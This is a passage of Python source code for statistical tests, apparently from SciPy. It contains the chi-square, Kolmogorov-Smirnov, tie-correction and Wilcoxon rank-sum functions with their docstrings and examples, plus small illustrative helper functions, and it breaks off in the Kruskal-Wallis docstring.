in the case of a correlated system of variables is such that it can be reasonably
supposed to have arisen from random sampling", Philosophical Magazine. Series 5. 50
(1900), pp. 157-175.
Examples
--------
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies.
>>> from scipy.stats import chisquare
>>> chisquare([16, 18, 16, 14, 12, 12])
(2.0, 0.84914503608460956)
With `f_exp` the expected frequencies can be given.
>>> chisquare([16, 18, 16, 14, 12, 12], f_exp=[16, 16, 16, 16, 16, 8])
(3.5, 0.62338762774958223)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> chisquare(obs)
(array([ 2. , 6.66666667]), array([ 0.84914504, 0.24663415]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> chisquare(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> chisquare(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
chi-squared statistic with `ddof`.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we use ``axis=1``:
>>> chisquare([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8], [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
return power_divergence(f_obs, f_exp=f_exp, ddof=ddof, axis=axis,
lambda_="pearson")
KstestResult = namedtuple('KstestResult', ('statistic', 'pvalue'))
def _compute_dplus(cdfvals):
"""Computes D+ as used in the Kolmogorov-Smirnov test.
Parameters
----------
cdfvals : array_like
Sorted array of CDF values between 0 and 1
Returns
-------
Maximum distance of the CDF values below Uniform(0, 1)
"""
n = len(cdfvals)
return (np.arange(1.0, n + 1) / n - cdfvals).max()
def _compute_dminus(cdfvals):
"""Computes D- as used in the Kolmogorov-Smirnov test.
Parameters
----------
cdfvals : array_like
Sorted array of CDF values between 0 and 1
Returns
-------
Maximum distance of the CDF values above Uniform(0, 1)
"""
n = len(cdfvals)
return (cdfvals - np.arange(0.0, n)/n).max()
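# Illustrative sketch, not part of the public API: the one-sample KS statistic
# is the larger of D+ and D- evaluated on the sorted CDF values. The `_demo_`
# helper and its default sample are made up; it assumes the module-level `np`
# and `distributions` imports used throughout this file.
def _demo_ks_statistic_by_hand(x=(-1.2, -0.3, 0.1, 0.8, 1.5)):
    x = np.sort(np.asarray(x, dtype=np.float64))
    cdfvals = distributions.norm.cdf(x)
    dplus = _compute_dplus(cdfvals)
    dminus = _compute_dminus(cdfvals)
    # This is the value ks_1samp(x, distributions.norm.cdf) reports as `statistic`.
    return max(dplus, dminus)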
def ks_1samp(x, cdf, args=(), alternative='two-sided', mode='auto'):
"""
Performs the one-sample Kolmogorov-Smirnov test for goodness of fit.
This test compares the underlying distribution F(x) of a sample
against a given continuous distribution G(x). See Notes for a description
of the available null and alternative hypotheses.
Parameters
----------
x : array_like
a 1-D array of observations of iid random variables.
cdf : callable
callable used to calculate the cdf.
args : tuple, sequence, optional
Distribution parameters, used with `cdf`.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the null and alternative hypotheses. Default is 'two-sided'.
Please see explanations in the Notes below.
mode : {'auto', 'exact', 'approx', 'asymp'}, optional
Defines the distribution used for calculating the p-value.
The following options are available (default is 'auto'):
* 'auto' : selects one of the other options.
* 'exact' : uses the exact distribution of test statistic.
* 'approx' : approximates the two-sided probability with twice
the one-sided probability
* 'asymp': uses asymptotic distribution of test statistic
Returns
-------
statistic : float
KS test statistic, either D, D+ or D- (depending on the value
of 'alternative')
pvalue : float
One-tailed or two-tailed p-value.
See Also
--------
ks_2samp, kstest
Notes
-----
There are three options for the null and corresponding alternative
hypothesis that can be selected using the `alternative` parameter.
- `two-sided`: The null hypothesis is that the two distributions are
identical, F(x)=G(x) for all x; the alternative is that they are not
identical.
- `less`: The null hypothesis is that F(x) >= G(x) for all x; the
alternative is that F(x) < G(x) for at least one x.
- `greater`: The null hypothesis is that F(x) <= G(x) for all x; the
alternative is that F(x) > G(x) for at least one x.
Note that the alternative hypotheses describe the *CDFs* of the
underlying distributions, not the observed values. For example,
suppose x1 ~ F and x2 ~ G. If F(x) > G(x) for all x, the values in
x1 tend to be less than those in x2.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> x = np.linspace(-15, 15, 9)
>>> stats.ks_1samp(x, stats.norm.cdf)
(0.44435602715924361, 0.038850142705171065)
>>> stats.ks_1samp(stats.norm.rvs(size=100, random_state=rng),
... stats.norm.cdf)
KstestResult(statistic=0.165471391799..., pvalue=0.007331283245...)
*Test against one-sided alternative hypothesis*
Shift distribution to larger values, so that ``CDF(x) < norm.cdf(x)``:
>>> x = stats.norm.rvs(loc=0.2, size=100, random_state=rng)
>>> stats.ks_1samp(x, stats.norm.cdf, alternative='less')
KstestResult(statistic=0.100203351482..., pvalue=0.125544644447...)
Reject null hypothesis in favor of alternative hypothesis: less
>>> stats.ks_1samp(x, stats.norm.cdf, alternative='greater')
KstestResult(statistic=0.018749806388..., pvalue=0.920581859791...)
Reject null hypothesis in favor of alternative hypothesis: greater
>>> stats.ks_1samp(x, stats.norm.cdf)
KstestResult(statistic=0.100203351482..., pvalue=0.250616879765...)
Don't reject null hypothesis in favor of alternative hypothesis: two-sided
*Testing t distributed random variables against normal distribution*
With 100 degrees of freedom the t distribution looks close to the normal
distribution, and the K-S test does not reject the hypothesis that the
sample came from the normal distribution:
>>> stats.ks_1samp(stats.t.rvs(100,size=100, random_state=rng),
... stats.norm.cdf)
KstestResult(statistic=0.064273776544..., pvalue=0.778737758305...)
With 3 degrees of freedom the t distribution looks sufficiently different
from the normal distribution, that we can reject the hypothesis that the
sample came from the normal distribution at the 10% level:
>>> stats.ks_1samp(stats.t.rvs(3,size=100, random_state=rng),
... stats.norm.cdf)
KstestResult(statistic=0.128678487493..., pvalue=0.066569081515...)
"""
alternative = {'t': 'two-sided', 'g': 'greater', 'l': 'less'}.get(
alternative.lower()[0], alternative)
if alternative not in ['two-sided', 'greater', 'less']:
raise ValueError("Unexpected alternative %s" % alternative)
if np.ma.is_masked(x):
x = x.compressed()
N = len(x)
x = np.sort(x)
cdfvals = cdf(x, *args)
if alternative == 'greater':
Dplus = _compute_dplus(cdfvals)
return KstestResult(Dplus, distributions.ksone.sf(Dplus, N))
if alternative == 'less':
Dminus = _compute_dminus(cdfvals)
return KstestResult(Dminus, distributions.ksone.sf(Dminus, N))
# alternative == 'two-sided':
Dplus = _compute_dplus(cdfvals)
Dminus = _compute_dminus(cdfvals)
D = np.max([Dplus, Dminus])
if mode == 'auto': # Always select exact
mode = 'exact'
if mode == 'exact':
prob = distributions.kstwo.sf(D, N)
elif mode == 'asymp':
prob = distributions.kstwobign.sf(D * np.sqrt(N))
else:
# mode == 'approx'
prob = 2 * distributions.ksone.sf(D, N)
prob = np.clip(prob, 0, 1)
return KstestResult(D, prob)
Ks_2sampResult = KstestResult
def _compute_prob_outside_square(n, h):
"""
Compute the proportion of paths that pass outside the two diagonal lines.
Parameters
----------
n : integer
n > 0
h : integer
0 <= h <= n
Returns
-------
p : float
The proportion of paths that pass outside the lines x-y = +/-h.
"""
# Compute Pr(D_{n,n} >= h/n)
# Prob = 2 * ( binom(2n, n-h) - binom(2n, n-2a) + binom(2n, n-3a) - ... )
# / binom(2n, n)
# This formulation exhibits subtractive cancellation.
# Instead divide each term by binom(2n, n), then factor common terms
# and use a Horner-like algorithm
# P = 2 * A0 * (1 - A1*(1 - A2*(1 - A3*(1 - A4*(...)))))
P = 0.0
k = int(np.floor(n / h))
while k >= 0:
p1 = 1.0
# Each of the Ai terms has numerator and denominator with
# h simple terms.
for j in range(h):
p1 = (n - k * h - j) * p1 / (n + k * h + j + 1)
P = p1 * (1.0 - P)
k -= 1
return 2 * P
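# Illustrative sketch, not part of the public API: for small n the stable
# Horner-style recursion above can be cross-checked against the direct
# alternating binomial sum, which is prone to cancellation for large n.
# The `_demo_` name is made up; `special.binom` is the module-level import
# already used in this file.
def _demo_prob_outside_square_direct(n, h):
    total = 0.0
    sign = 1.0
    k = 1
    while n - k * h >= 0:
        total += sign * special.binom(2 * n, n - k * h)
        sign = -sign
        k += 1
    return 2.0 * total / special.binom(2 * n, n)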
def _count_paths_outside_method(m, n, g, h):
"""Count the number of paths that pass outside the specified diagonal.
Parameters
----------
m : integer
m > 0
n : integer
n > 0
g : integer
g is greatest common divisor of m and n
h : integer
0 <= h <= lcm(m,n)
Returns
-------
p : float
The number of paths that go low.
The calculation may overflow - check for a finite answer.
Raises
------
FloatingPointError: Raised if the intermediate computation goes outside
the range of a float.
Notes
-----
Count the integer lattice paths from (0, 0) to (m, n), which at some
point (x, y) along the path, satisfy:
m*y <= n*x - h*g
The paths make steps of size +1 in either positive x or positive y
directions.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk.
Hodges, J.L. Jr.,
"The Significance Probability of the Smirnov Two-Sample Test,"
Arkiv för Matematik, 3, No. 43 (1958), 469-86.
"""
# Compute #paths which stay lower than x/m-y/n = h/lcm(m,n)
# B(x, y) = #{paths from (0,0) to (x,y) without
# previously crossing the boundary}
# = binom(x, y) - #{paths which already reached the boundary}
# Multiply by the number of path extensions going from (x, y) to (m, n)
# Sum.
# Probability is symmetrical in m, n. Computation below assumes m >= n.
if m < n:
m, n = n, m
mg = m // g
ng = n // g
# Not every x needs to be considered.
# xj holds the list of x values to be checked.
# Wherever n*x/m + ng*h crosses an integer
lxj = n + (mg-h)//mg
xj = [(h + mg * j + ng-1)//ng for j in range(lxj)]
# B is an array just holding a few values of B(x,y), the ones needed.
# B[j] == B(x_j, j)
if lxj == 0:
return np.round(special.binom(m + n, n))
B = np.zeros(lxj)
B[0] = 1
# Compute the B(x, y) terms
# The binomial coefficient is an integer, but special.binom()
# may return a float. Round it to the nearest integer.
for j in range(1, lxj):
Bj = np.round(special.binom(xj[j] + j, j))
if not np.isfinite(Bj):
raise FloatingPointError()
for i in range(j):
bin = np.round(special.binom(xj[j] - xj[i] + j - i, j-i))
Bj -= bin * B[i]
B[j] = Bj
if not np.isfinite(Bj):
raise FloatingPointError()
# Compute the number of path extensions...
num_paths = 0
for j in range(lxj):
bin = np.round(special.binom((m-xj[j]) + (n - j), n-j))
term = B[j] * bin
if not np.isfinite(term):
raise FloatingPointError()
num_paths += term
return np.round(num_paths)
def _attempt_exact_2kssamp(n1, n2, g, d, alternative):
"""Attempts to compute the exact 2sample probability.
n1, n2 are the sample sizes
g is the gcd(n1, n2)
d is the computed max difference in ECDFs
Returns (success, d, probability)
"""
lcm = (n1 // g) * n2
h = int(np.round(d * lcm))
d = h * 1.0 / lcm
if h == 0:
return True, d, 1.0
saw_fp_error, prob = False, np.nan
try:
if alternative == 'two-sided':
if n1 == n2:
prob = _compute_prob_outside_square(n1, h)
else:
prob = _compute_outer_prob_inside_method(n1, n2, g, h)
else:
if n1 == n2:
# prob = binom(2n, n-h) / binom(2n, n)
# Evaluating in that form incurs roundoff errors
# from special.binom. Instead calculate directly
jrange = np.arange(h)
prob = np.prod((n1 - jrange) / (n1 + jrange + 1.0))
else:
num_paths = _count_paths_outside_method(n1, n2, g, h)
bin = special.binom(n1 + n2, n1)
if not np.isfinite(bin) or not np.isfinite(num_paths)\
or num_paths > bin:
saw_fp_error = True
else:
prob = num_paths / bin
except FloatingPointError:
saw_fp_error = True
if saw_fp_error:
return False, d, np.nan
if not (0 <= prob <= 1):
return False, d, prob
return True, d, prob
def ks_2samp(data1, data2, alternative='two-sided', mode='auto'):
"""
Performs the two-sample Kolmogorov-Smirnov test for goodness of fit.
This test compares the underlying continuous distributions F(x) and G(x)
of two independent samples. See Notes for a description
of the available null and alternative hypotheses.
Parameters
----------
data1, data2 : array_like, 1-Dimensional
Two arrays of sample observations assumed to be drawn from a continuous
distribution, sample sizes can be different.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the null and alternative hypotheses. Default is 'two-sided'.
Please see explanations in the Notes below.
mode : {'auto', 'exact', 'asymp'}, optional
Defines the method used for calculating the p-value.
The following options are available (default is 'auto'):
* 'auto' : use 'exact' for small size arrays, 'asymp' for large
* 'exact' : use exact distribution of test statistic
* 'asymp' : use asymptotic distribution of test statistic
Returns
-------
statistic : float
KS statistic.
pvalue : float
One-tailed or two-tailed p-value.
See Also
--------
kstest, ks_1samp, epps_singleton_2samp, anderson_ksamp
Notes
-----
There are three options for the null and corresponding alternative
hypothesis that can be selected using the `alternative` parameter.
- `two-sided`: The null hypothesis is that the two distributions are
identical, F(x)=G(x) for all x; the alternative is that they are not
identical.
- `less`: The null hypothesis is that F(x) >= G(x) for all x; the
alternative is that F(x) < G(x) for at least one x.
- `greater`: The null hypothesis is that F(x) <= G(x) for all x; the
alternative is that F(x) > G(x) for at least one x.
Note that the alternative hypotheses describe the *CDFs* of the
underlying distributions, not the observed values. For example,
suppose x1 ~ F and x2 ~ G. If F(x) > G(x) for all x, the values in
x1 tend to be less than those in x2.
If the KS statistic is small or the p-value is high, then we cannot
reject the null hypothesis in favor of the alternative.
If the mode is 'auto', the computation is exact if the sample sizes are
less than 10000. For larger sizes, the computation uses the
Kolmogorov-Smirnov distributions to compute an approximate value.
The 'two-sided' 'exact' computation computes the complementary probability
and then subtracts from 1. As such, the minimum probability it can return
is about 1e-16. While the algorithm itself is exact, numerical
errors may accumulate for large sample sizes. It is most suited to
situations in which one of the sample sizes is only a few thousand.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk [1]_.
References
----------
.. [1] Hodges, J.L. Jr., "The Significance Probability of the Smirnov
Two-Sample Test," Arkiv för Matematik, 3, No. 43 (1958), 469-86.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> n1 = 200 # size of first sample
>>> n2 = 300 # size of second sample
For a different distribution, we can reject the null hypothesis since the
pvalue is below 1%:
>>> rvs1 = stats.norm.rvs(size=n1, loc=0., scale=1, random_state=rng)
>>> rvs2 = stats.norm.rvs(size=n2, loc=0.5, scale=1.5, random_state=rng)
>>> stats.ks_2samp(rvs1, rvs2)
KstestResult(statistic=0.24833333333333332, pvalue=5.846586728086578e-07)
For a slightly different distribution, we cannot reject the null hypothesis
at a 10% or lower alpha since the p-value, about 0.44, is higher than 10%:
>>> rvs3 = stats.norm.rvs(size=n2, loc=0.01, scale=1.0, random_state=rng)
>>> stats.ks_2samp(rvs1, rvs3)
KstestResult(statistic=0.07833333333333334, pvalue=0.4379658456442945)
For an identical distribution, we cannot reject the null hypothesis since
the p-value, about 0.054, is above 5%:
>>> rvs4 = stats.norm.rvs(size=n2, loc=0.0, scale=1.0, random_state=rng)
>>> stats.ks_2samp(rvs1, rvs4)
KstestResult(statistic=0.12166666666666667, pvalue=0.05401863039081145)
"""
if mode not in ['auto', 'exact', 'asymp']:
raise ValueError(f'Invalid value for mode: {mode}')
alternative = {'t': 'two-sided', 'g': 'greater', 'l': 'less'}.get(
alternative.lower()[0], alternative)
if alternative not in ['two-sided', 'less', 'greater']:
raise ValueError(f'Invalid value for alternative: {alternative}')
MAX_AUTO_N = 10000 # 'auto' will attempt to be exact if n1,n2 <= MAX_AUTO_N
if np.ma.is_masked(data1):
data1 = data1.compressed()
if np.ma.is_masked(data2):
data2 = data2.compressed()
data1 = np.sort(data1)
data2 = np.sort(data2)
n1 = data1.shape[0]
n2 = data2.shape[0]
if min(n1, n2) == 0:
raise ValueError('Data passed to ks_2samp must not be empty')
data_all = np.concatenate([data1, data2])
# using searchsorted solves equal data problem
cdf1 = np.searchsorted(data1, data_all, side='right') / n1
cdf2 = np.searchsorted(data2, data_all, side='right') / n2
cddiffs = cdf1 - cdf2
# Ensure sign of minS is not negative.
minS = np.clip(-np.min(cddiffs), 0, 1)
maxS = np.max(cddiffs)
alt2Dvalue = {'less': minS, 'greater': maxS, 'two-sided': max(minS, maxS)}
d = alt2Dvalue[alternative]
g = gcd(n1, n2)
n1g = n1 // g
n2g = n2 // g
prob = -np.inf
original_mode = mode
if mode == 'auto':
mode = 'exact' if max(n1, n2) <= MAX_AUTO_N else 'asymp'
elif mode == 'exact':
# If lcm(n1, n2) is too big, switch from exact to asymp
if n1g >= np.iinfo(np.int32).max / n2g:
mode = 'asymp'
warnings.warn(
f"Exact ks_2samp calculation not possible with samples sizes "
f"{n1} and {n2}. Switching to 'asymp'.", RuntimeWarning)
if mode == 'exact':
success, d, prob = _attempt_exact_2kssamp(n1, n2, g, d, alternative)
if not success:
mode = 'asymp'
if original_mode == 'exact':
warnings.warn(f"ks_2samp: Exact calculation unsuccessful. "
f"Switching to mode={mode}.", RuntimeWarning)
if mode == 'asymp':
# The product n1*n2 is large. Use Smirnov's asymptotic formula.
# Ensure float to avoid overflow in multiplication
# sorted because the one-sided formula is not symmetric in n1, n2
m, n = sorted([float(n1), float(n2)], reverse=True)
en = m * n / (m + n)
if alternative == 'two-sided':
prob = distributions.kstwo.sf(d, np.round(en))
else:
z = np.sqrt(en) * d
# Use Hodges' suggested approximation Eqn 5.3
# Requires m to be the larger of (n1, n2)
expt = -2 * z**2 - 2 * z * (m + 2*n)/np.sqrt(m*n*(m+n))/3.0
prob = np.exp(expt)
prob = np.clip(prob, 0, 1)
return KstestResult(d, prob)
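# Illustrative sketch, not part of the public API: the two-sample KS statistic
# is the largest absolute difference between the two empirical CDFs evaluated
# at every observed point. The `_demo_` name is made up; plain 1-D inputs are
# assumed.
def _demo_ks_2samp_statistic(data1, data2):
    data1 = np.sort(np.asarray(data1, dtype=np.float64))
    data2 = np.sort(np.asarray(data2, dtype=np.float64))
    data_all = np.concatenate([data1, data2])
    cdf1 = np.searchsorted(data1, data_all, side='right') / data1.size
    cdf2 = np.searchsorted(data2, data_all, side='right') / data2.size
    # Same value that ks_2samp(data1, data2) reports as `statistic` for the
    # default alternative='two-sided'.
    return np.max(np.abs(cdf1 - cdf2))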
def _parse_kstest_args(data1, data2, args, N):
# kstest allows many different variations of arguments.
# Pull out the parsing into a separate function
# (xvals, yvals, ) # 2sample
# (xvals, cdf function,..)
# (xvals, name of distribution, ...)
# (name of distribution, name of distribution, ...)
# Returns xvals, yvals, cdf
# where cdf is a cdf function, or None
# and yvals is either an array_like of values, or None
# and xvals is array_like.
rvsfunc, cdf = None, None
if isinstance(data1, str):
rvsfunc = getattr(distributions, data1).rvs
elif callable(data1):
rvsfunc = data1
if isinstance(data2, str):
cdf = getattr(distributions, data2).cdf
data2 = None
elif callable(data2):
cdf = data2
data2 = None
data1 = np.sort(rvsfunc(*args, size=N) if rvsfunc else data1)
return data1, data2, cdf
def kstest(rvs, cdf, args=(), N=20, alternative='two-sided', mode='auto'):
"""
Performs the (one-sample or two-sample) Kolmogorov-Smirnov test for
goodness of fit.
The one-sample test compares the underlying distribution F(x) of a sample
against a given distribution G(x). The two-sample test compares the
underlying distributions of two independent samples. Both tests are valid
only for continuous distributions.
Parameters
----------
rvs : str, array_like, or callable
If an array, it should be a 1-D array of observations of random
variables.
If a callable, it should be a function to generate random variables;
it is required to have a keyword argument `size`.
If a string, it should be the name of a distribution in `scipy.stats`,
which will be used to generate random variables.
cdf : str, array_like or callable
If array_like, it should be a 1-D array of observations of random
variables, and the two-sample test is performed
(and rvs must be array_like).
If a callable, that callable is used to calculate the cdf.
If a string, it should be the name of a distribution in `scipy.stats`,
which will be used as the cdf function.
args : tuple, sequence, optional
Distribution parameters, used if `rvs` or `cdf` are strings or
callables.
N : int, optional
Sample size if `rvs` is string or callable. Default is 20.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the null and alternative hypotheses. Default is 'two-sided'.
Please see explanations in the Notes below.
mode : {'auto', 'exact', 'approx', 'asymp'}, optional
Defines the distribution used for calculating the p-value.
The following options are available (default is 'auto'):
* 'auto' : selects one of the other options.
* 'exact' : uses the exact distribution of test statistic.
* 'approx' : approximates the two-sided probability with twice the
one-sided probability
* 'asymp': uses asymptotic distribution of test statistic
Returns
-------
statistic : float
KS test statistic, either D, D+ or D-.
pvalue : float
One-tailed or two-tailed p-value.
See Also
--------
ks_2samp
Notes
-----
There are three options for the null and corresponding alternative
hypothesis that can be selected using the `alternative` parameter.
- `two-sided`: The null hypothesis is that the two distributions are
identical, F(x)=G(x) for all x; the alternative is that they are not
identical.
- `less`: The null hypothesis is that F(x) >= G(x) for all x; the
alternative is that F(x) < G(x) for at least one x.
- `greater`: The null hypothesis is that F(x) <= G(x) for all x; the
alternative is that F(x) > G(x) for at least one x.
Note that the alternative hypotheses describe the *CDFs* of the
underlying distributions, not the observed values. For example,
suppose x1 ~ F and x2 ~ G. If F(x) > G(x) for all x, the values in
x1 tend to be less than those in x2.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> x = np.linspace(-15, 15, 9)
>>> stats.kstest(x, 'norm')
KstestResult(statistic=0.444356027159..., pvalue=0.038850140086...)
>>> stats.kstest(stats.norm.rvs(size=100, random_state=rng), stats.norm.cdf)
KstestResult(statistic=0.165471391799..., pvalue=0.007331283245...)
The above lines are equivalent to:
>>> stats.kstest(stats.norm.rvs, 'norm', N=100)
KstestResult(statistic=0.113810164200..., pvalue=0.138690052319...) # may vary
*Test against one-sided alternative hypothesis*
Shift distribution to larger values, so that ``CDF(x) < norm.cdf(x)``:
>>> x = stats.norm.rvs(loc=0.2, size=100, random_state=rng)
>>> stats.kstest(x, 'norm', alternative='less')
KstestResult(statistic=0.1002033514..., pvalue=0.1255446444...)
Reject null hypothesis in favor of alternative hypothesis: less
>>> stats.kstest(x, 'norm', alternative='greater')
KstestResult(statistic=0.018749806388..., pvalue=0.920581859791...)
Don't reject null hypothesis in favor of alternative hypothesis: greater
>>> stats.kstest(x, 'norm')
KstestResult(statistic=0.100203351482..., pvalue=0.250616879765...)
*Testing t distributed random variables against normal distribution*
With 100 degrees of freedom the t distribution looks close to the normal
distribution, and the K-S test does not reject the hypothesis that the
sample came from the normal distribution:
>>> stats.kstest(stats.t.rvs(100, size=100, random_state=rng), 'norm')
KstestResult(statistic=0.064273776544..., pvalue=0.778737758305...)
With 3 degrees of freedom the t distribution looks sufficiently different
from the normal distribution, that we can reject the hypothesis that the
sample came from the normal distribution at the 10% level:
>>> stats.kstest(stats.t.rvs(3, size=100, random_state=rng), 'norm')
KstestResult(statistic=0.128678487493..., pvalue=0.066569081515...)
"""
# to not break compatibility with existing code
if alternative == 'two_sided':
alternative = 'two-sided'
if alternative not in ['two-sided', 'greater', 'less']:
raise ValueError("Unexpected alternative %s" % alternative)
xvals, yvals, cdf = _parse_kstest_args(rvs, cdf, args, N)
if cdf:
return ks_1samp(xvals, cdf, args=args, alternative=alternative,
mode=mode)
return ks_2samp(xvals, yvals, alternative=alternative, mode=mode)
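# Illustrative sketch, not part of the public API: the three call forms that
# _parse_kstest_args accepts. The `_demo_` name, the sample sizes, and the use
# of numpy's default_rng are made up for illustration; results vary with the
# random draws.
def _demo_kstest_call_forms(seed=None):
    rng = np.random.default_rng(seed)
    sample = rng.standard_normal(50)
    by_name = kstest(sample, 'norm')                      # data vs. named distribution
    by_callable = kstest(sample, distributions.norm.cdf)  # data vs. callable cdf
    two_sample = kstest(sample, rng.standard_normal(60))  # data vs. second sample
    return by_name, by_callable, two_sample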
def tiecorrect(rankvals):
"""Tie correction factor for Mann-Whitney U and Kruskal-Wallis H tests.
Parameters
----------
rankvals : array_like
A 1-D sequence of ranks. Typically this will be the array
returned by `~scipy.stats.rankdata`.
Returns
-------
factor : float
Correction factor for U or H.
See Also
--------
rankdata : Assign ranks to the data
mannwhitneyu : Mann-Whitney rank test
kruskal : Kruskal-Wallis H test
References
----------
.. [1] Siegel, S. (1956) Nonparametric Statistics for the Behavioral
Sciences. New York: McGraw-Hill.
Examples
--------
>>> from scipy.stats import tiecorrect, rankdata
>>> tiecorrect([1, 2.5, 2.5, 4])
0.9
>>> ranks = rankdata([1, 3, 2, 4, 5, 7, 2, 8, 4])
>>> ranks
array([ 1. , 4. , 2.5, 5.5, 7. , 8. , 2.5, 9. , 5.5])
>>> tiecorrect(ranks)
0.9833333333333333
"""
arr = np.sort(rankvals)
idx = np.nonzero(np.r_[True, arr[1:] != arr[:-1], True])[0]
cnt = np.diff(idx).astype(np.float64)
size = np.float64(arr.size)
return 1.0 if size < 2 else 1.0 - (cnt**3 - cnt).sum() / (size**3 - size)
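# Illustrative sketch, not part of the public API: the tie correction factor is
# 1 - sum(t**3 - t) / (n**3 - n), where t runs over the sizes of the groups of
# tied ranks. The `_demo_` name is made up; a plain 1-D array of ranks is
# assumed.
def _demo_tiecorrect_by_hand(ranks):
    ranks = np.asarray(ranks, dtype=np.float64)
    n = ranks.size
    if n < 2:
        return 1.0
    _, counts = np.unique(ranks, return_counts=True)
    counts = counts.astype(np.float64)
    return 1.0 - (counts**3 - counts).sum() / (n**3 - n)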
RanksumsResult = namedtuple('RanksumsResult', ('statistic', 'pvalue'))
@_axis_nan_policy_factory(RanksumsResult, n_samples=2)
def ranksums(x, y, alternative='two-sided'):
"""Compute the Wilcoxon rank-sum statistic for two samples.
The Wilcoxon rank-sum test tests the null hypothesis that two sets
of measurements are drawn from the same distribution. The alternative
hypothesis is that values in one sample are more likely to be
larger than the values in the other sample.
This test should be used to compare two samples from continuous
distributions. It does not handle ties between measurements
in x and y. For tie-handling and an optional continuity correction
see `scipy.stats.mannwhitneyu`.
Parameters
----------
x,y : array_like
The data from the two samples.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis. Default is 'two-sided'.
The following options are available:
* 'two-sided': one of the distributions (underlying `x` or `y`) is
stochastically greater than the other.
* 'less': the distribution underlying `x` is stochastically less
than the distribution underlying `y`.
* 'greater': the distribution underlying `x` is stochastically greater
than the distribution underlying `y`.
.. versionadded:: 1.7.0
Returns
-------
statistic : float
The test statistic under the large-sample approximation that the
rank sum statistic is normally distributed.
pvalue : float
The p-value of the test.
References
----------
.. [1] https://en.wikipedia.org/wiki/Wilcoxon_rank-sum_test
Examples
--------
We can test the hypothesis that two independent unequal-sized samples are
drawn from the same distribution by computing the Wilcoxon rank-sum
statistic.
>>> from scipy.stats import ranksums
>>> rng = np.random.default_rng()
>>> sample1 = rng.uniform(-1, 1, 200)
>>> sample2 = rng.uniform(-0.5, 1.5, 300) # a shifted distribution
>>> ranksums(sample1, sample2)
RanksumsResult(statistic=-7.887059, pvalue=3.09390448e-15) # may vary
>>> ranksums(sample1, sample2, alternative='less')
RanksumsResult(statistic=-7.750585297581713, pvalue=4.573497606342543e-15) # may vary
>>> ranksums(sample1, sample2, alternative='greater')
RanksumsResult(statistic=-7.750585297581713, pvalue=0.9999999999999954) # may vary
A p-value of less than ``0.05`` indicates that this test rejects the
null hypothesis at the 5% significance level.
"""
x, y = map(np.asarray, (x, y))
n1 = len(x)
n2 = len(y)
alldata = np.concatenate((x, y))
ranked = rankdata(alldata)
x = ranked[:n1]
s = np.sum(x, axis=0)
expected = n1 * (n1+n2+1) / 2.0
z = (s - expected) / np.sqrt(n1*n2*(n1+n2+1)/12.0)
z, prob = _normtest_finish(z, alternative)
return RanksumsResult(z, prob)
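# Illustrative sketch, not part of the public API: the rank-sum z statistic by
# hand, mirroring the computation above. The `_demo_` name is made up; plain
# 1-D inputs and the module-level `rankdata` import are assumed.
def _demo_ranksums_z(x, y):
    x = np.asarray(x, dtype=np.float64)
    y = np.asarray(y, dtype=np.float64)
    n1, n2 = x.size, y.size
    ranks = rankdata(np.concatenate((x, y)))
    s = ranks[:n1].sum()
    expected = n1 * (n1 + n2 + 1) / 2.0
    return (s - expected) / np.sqrt(n1 * n2 * (n1 + n2 + 1) / 12.0)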
KruskalResult = namedtuple('KruskalResult', ('statistic', 'pvalue'))
@_axis_nan_policy_factory(KruskalResult, n_samples=None)
def kruskal(*args, nan_policy='propagate'):
"""Compute the Kruskal-Wallis H-test for independent samples.
The Kruskal-Wallis H-test tests the null hypothesis that the population
medians of all of the groups are equal. It is a non-parametric version of
ANOVA. The test works on 2 or more independent samples, which may have
different sizes. Note that rejecting the null hypothesis does not
indicate which of the groups differs. Post hoc comparisons between
groups are required to determine which groups are different.
Parameters
----------
sample1, sample2, ... : array_like
Two or more arrays with the sample measurements can be given as
arguments. Samples must be one-dimensional.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The Kruskal-Wallis H statistic, corrected for ties.
pvalue : float
The p-value for the test using the assumption that H has a chi
square distribution. The p-value returned is the survival function of
the chi square distribution evaluated at H.
See Also
--------
f_oneway : 1-way ANOVA.
mannwhitneyu : Mann-Whitney rank test on two samples.
friedmanchisquare : Friedman test for repeated measurements.
Notes
-----
Due to the assumption that H has a chi square distribution, the number
of samples in each group must not be too small. A typical rule is
that each sample must have at least 5 measurements.
References
----------
.. [1] W. H. Kruskal & W. W. Wallis, "Use of Ranks in
One-Criterion Variance Analysis", Journal of the American Statistical
Association, Vol. 47, Issue 260, pp. 583-621, 1952.
.. [2] https://en.wikipedia.org/wiki/Kruskal-Wallis_one-way_analysis_of_variance
Examples
--------
>>> from scipy import stats
>>> x = [1, 3, 5, 7, 9]
>>> y = [2, 4, 6, 8, 10]
>>> stats.kruskal(x, y)
